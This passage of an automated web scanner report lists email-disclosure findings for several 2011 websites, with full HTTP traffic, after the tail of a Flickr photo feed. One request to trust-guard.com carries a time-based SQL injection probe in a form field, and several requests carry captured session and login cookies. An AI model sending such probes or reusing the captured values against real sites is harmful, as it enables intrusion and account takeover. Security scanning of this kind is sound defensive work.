           "published": "2011-03-09T01:14:03Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Navsher and Nasrin greet a customer",
           "link": "http://www.flickr.com/photos/kaya
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:13:45Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Varun demonstrating Kayako Fusion",
           "link": "http://www.flickr.com/photos/kayako
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:13:29Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Nasrin manning the desk",
           "link": "http://www.flickr.com/photos/kayakocom/551036
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:13:24Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Raghav and Nasrin",
           "link": "http://www.flickr.com/photos/kayakocom/5510365571/"
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:13:20Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Kayako goodies",
           "link": "http://www.flickr.com/photos/kayakocom/5510365353/",
   
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:13:14Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Building the booth",
           "link": "http://www.flickr.com/photos/kayakocom/5510365113/
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:13:09Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "CeBIT entrance",
           "link": "http://www.flickr.com/photos/kayakocom/5510965792/",
   
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:12:59Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "More demoing",
           "link": "http://www.flickr.com/photos/kayakocom/5510364381/",
           
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:12:49Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Demoing",
           "link": "http://www.flickr.com/photos/kayakocom/5510364055/",
           "medi
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:12:40Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Our humble abode",
           "link": "http://www.flickr.com/photos/kayakocom/5510363907/",
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:12:36Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "A rare quiet moment",
           "link": "http://www.flickr.com/photos/kayakocom/5510363615
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:12:28Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "CeBIT at night",
           "link": "http://www.flickr.com/photos/kayakocom/5510964312/",
   
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:12:20Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Kayako swag was popular",
           "link": "http://www.flickr.com/photos/kayakocom/551096
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:12:10Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Demos and pitches",
           "link": "http://www.flickr.com/photos/kayakocom/5510362681/"
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:12:01Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "More of our neighbours",
           "link": "http://www.flickr.com/photos/kayakocom/5510963
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:11:54Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Navsher and Ryan from Razer",
           "link": "http://www.flickr.com/photos/kayakocom/55
...[SNIP]...
<\/p>",
           "published": "2011-03-09T01:11:45Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Hall 2 (of nearly 30!)",
           "link": "http://www.flickr.com/photos/kayakocom/5510361
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:11:35Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Checking us out",
           "link": "http://www.flickr.com/photos/kayakocom/5510361227/",

...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:11:22Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    },
    {
           "title": "Building the booth",
           "link": "http://www.flickr.com/photos/kayakocom/5510962126/
...[SNIP]...
<\/p> ",
           "published": "2011-03-09T01:11:17Z",
           "author": "nobody@flickr.com (kayako.com)",
           "author_id": "35898586@N08",
           "tags": "hanover cebit kayako cebit2011"
    }
]
})
27.2. http://customer.kronos.com/EdServices/tooltip.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.kronos.com
Path:   /EdServices/tooltip.js

Issue detail

The following email address was disclosed in the response:

Request

GET /EdServices/tooltip.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: customer.kronos.com

Response

HTTP/1.1 200 OK
Content-Length: 7384
Content-Type: application/x-javascript
Last-Modified: Tue, 25 Mar 2008 19:41:19 GMT
Accept-Ranges: bytes
ETag: "5d378732b08ec81:1249"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 13:53:52 GMT

...<!--
/*
Pleas leave this notice.
DHTML tip message version 1.5.4 copyright Essam Gamal 2003
Home Page: (http://migoicons.tripod.com)
Email: (migoicons@hotmail.com)
Updated on :7/30/2003
*/

var MI_IE=MI_IE4=MI_NN4=MI_ONN=MI_NN=MI_pSub=MI_sNav=0;mig_dNav()
var Style=[],Text=[],Count=0,move=0,fl=0,isOK=1,hs,e_d,tb,w=window,PX=(MI_pSub)?"px":""
var d_r=(MI
...[SNIP]...
27.3. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
<a href="mailto:support@direct.yandex.ru">
...[SNIP]...
27.4. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The following email address was disclosed in the response:

Request

GET /hmc/report/?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</em> gm12345@MyCompany.com</TD>
...[SNIP]...
27.5. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /hmc/report/index.cfm?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</em> gm12345@MyCompany.com</TD>
...[SNIP]...
27.6. http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.en25.com
Path:   /Web/KronosIncorporated/astadia-gated-forms-ver-3.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Web/KronosIncorporated/astadia-gated-forms-ver-3.js HTTP/1.1
Host: img.en25.com
Proxy-Connection: keep-alive
Referer: http://solutions.kronos.com/forms/experience2011
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 22 Aug 2010 02:15:10 GMT
Accept-Ranges: bytes
ETag: "fb74f6d89f41cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 16182
Cache-Control: max-age=3600
Date: Mon, 25 Apr 2011 14:22:27 GMT
Connection: close


/* PRE-DFINED VARIABLES */
// v_email
// c_email
// c_isRegistered

// elqCookieDLKey
// elqContactDLKey
// elqProspectDLKey

// g_redir_host
// g_short_form_uri
// g_long_form_uri

//
...[SNIP]...
yle.left = '-1000px';

document.body.appendChild(io);

return io            
}


/***************************/
//@Author: Adrian "yEnS" Mato Gondelle
//@website: www.yensdesign.com
//@email: yensamg@gmail.com
//@license: Feel free to use it, but keep this credits please!                    
/***************************/

//SETTING UP OUR POPUP
//0 means disabled; 1 means enabled;
var popupStatus = 0;

//loading p
...[SNIP]...
27.7. http://l-stat.livejournal.com/js/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l-stat.livejournal.com
Path:   /js/

Issue detail

The following email address was disclosed in the response:

Request

GET /js/??jquery/jquery.ui.core.min.js,jquery/jquery.ui.widget.min.js,jquery/jquery.lj.bubble.js,contextualhover.js,stats.js,widgets/qotd.js,widgets/journalspotlight.js,widgets/photos2homepage.js,widgets/potd.js,widget_ippu/addvgift.js,widget_ippu/vgiftsmspay.js,widgets/shopvgift.js,inputcomplete.js,settingprod.js,widget_ippu/settingprod.js,horizon.js?v=1302809072 HTTP/1.1
Host: l-stat.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Perlbal
Content-Type: application/x-javascript
Cache-Control: public, max-age=31536000
ETag: HlATaNEjXLJzuO3FK0MglA
Vary: Accept-Encoding
Age: 930710
Date: Mon, 25 Apr 2011 14:29:19 GMT
Last-Modified: Thu, 14 Apr 2011 19:24:32 GMT
Expires: Fri, 13 Apr 2012 20:11:15 GMT
Connection: keep-alive
Content-Length: 74792

/*!
* jQuery UI 1.8.10
*
* Copyright 2011, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.co
...[SNIP]...
a];c[f]=c.originalEvent[f]}}this.element.trigger(c,d);return!(b.isFunction(e)&&e.call(this.element[0],c,d)===false||c.isDefaultPrevented())}}})(jQuery);
/*!
* LiveJournal Bubble
*
* Copyright 2011, sergey.zhirkov@sup.com
*
* http://docs.jquery.com/UI
*
* Depends:
*    jquery.ui.core.js
*    jquery.ui.widget.js
*
* Usage:
*    <script>
...[SNIP]...
27.8. http://learn.shavlik.com/shavlik/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/

Issue detail

The following email address was disclosed in the response:

Request

GET /shavlik/ HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.3.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                               
...[SNIP]...
<a href="mailto:sales@shavlik.com" >sales@shavlik.com</a>
...[SNIP]...
27.9. http://learn.shavlik.com/shavlik/download.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/download.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /shavlik/download.cfm?nFileID=407 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.4.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                   
...[SNIP]...
<div id=footer>Shavlik Technologies, LLC | Privacy Policy | Direct: (800) 690-6911, (651) 426-6624; Fax: (651) 426-3345; Support: (866) 407-5279; Email: sales@shavlik.com</div>
...[SNIP]...
27.10. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /shavlik/index.cfm?pg=341 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.5.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                   
...[SNIP]...
<a href="mailto:info@shavlik.com">info@shavlik.com</a>
...[SNIP]...
<a href="mailto:sales@shavlik.com" >sales@shavlik.com</a>
...[SNIP]...
27.11. http://mail.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<!--Rating@Mail.ru counter-->
...[SNIP]...
<!--// Rating@Mail.ru counter-->
...[SNIP]...
27.12. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The following email address was disclosed in the response:

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 97

btnCancel=%27;WAITFOR%20DELAY%20%270:0:25%27--&btnSubmit=Submit&txtEmail=netsparker%40example.com

Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check
...[SNIP]...
<input id="txtEmail" name="txtEmail" type="text" value="netsparker@example.com" style="width:300px" onblur="validatePresent(this,'msg_email');" />
...[SNIP]...
27.13. http://solutions.kronos.com/forms/experience2011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.kronos.com
Path:   /forms/experience2011

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forms/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.10.10.1303738437

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 14:59:53 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Last-Modfied: Mon, 25 Apr 2011 10:54:53 GMT
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:53 GMT
Content-Length: 52775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<input type="hidden" name="notificationEmailAddress" value="Nandini.Sen@kronos.com;Carol.Nowakowski@kronos.com;" />
...[SNIP]...
27.14. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The following email address was disclosed in the response:

Request

POST /index.php HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand; SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 75

_a=searchclient&_m=core&searchquery=&searchtype=knowledgebase&Submit=Search

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:18 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 56562


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
<span class="dlitempreview">To access your Trust Guard Member Control Panel, go to: http://secure.trust-guard.com
Enter your Log In Email and Password. Please contact support@Trust-Guard.com with any questions.</span>
...[SNIP]...
27.15. http://tengrinews.kz/static/js/browserTouchSupport.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /static/js/browserTouchSupport.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/browserTouchSupport.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:20:48 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Tue, 22 Feb 2011 05:08:59 GMT
ETag: "be08b-a10-49cd7fa5ad0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2576

/*
* jQuery touch and gesture detection.
*
* identifies support for touch and gestures.
*
* Usage:
*
* if ($fn.browserTouchSupport.touches) {
* // Touch specific interactions
* }
*
...[SNIP]...
<jeff@tropicalpixels.com>
...[SNIP]...
27.16. http://tengrinews.kz/static/js/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /static/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/jquery.cookie.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
